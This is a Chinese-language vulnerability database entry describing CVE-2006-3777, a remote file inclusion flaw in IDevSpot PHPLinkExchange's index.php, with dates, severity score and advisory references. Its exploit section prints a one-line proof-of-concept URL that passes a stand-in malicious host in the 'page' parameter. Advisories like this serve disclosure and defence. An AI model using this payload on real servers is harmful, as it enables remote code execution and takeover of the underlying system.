IDevSpot PHPLinkExchange 'Index.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110642 漏洞类型 代码注入
发布时间 2006-07-20 更新时间 2006-08-07
CVE编号 CVE-2006-3777 CNNVD-ID CNNVD-200607-399
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28247
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-399
|漏洞详情
IDevSpotPhpLinkExchange1.0的index.php存在PHP远程文件包含漏洞,远程攻击者可借助page参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19083/info

PHPLinkExchange is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/index.php?page=http://[malicious_site]/file
|参考资料

来源:XF
名称:phplinkexchange-index-file-include(27851)
链接:http://xforce.iss.net/xforce/xfdb/27851
来源:BID
名称:19083
链接:http://www.securityfocus.com/bid/19083
来源:OSVDB
名称:27410
链接:http://www.osvdb.org/27410
来源:VUPEN
名称:ADV-2006-2900
链接:http://www.frsirt.com/english/advisories/2006/2900
来源:SECUNIA
名称:21126
链接:http://secunia.com/advisories/21126
来源:MISC
链接:http://pridels0.blogspot.com/2006/07/phplinkexchange-remote-file-inclusion.html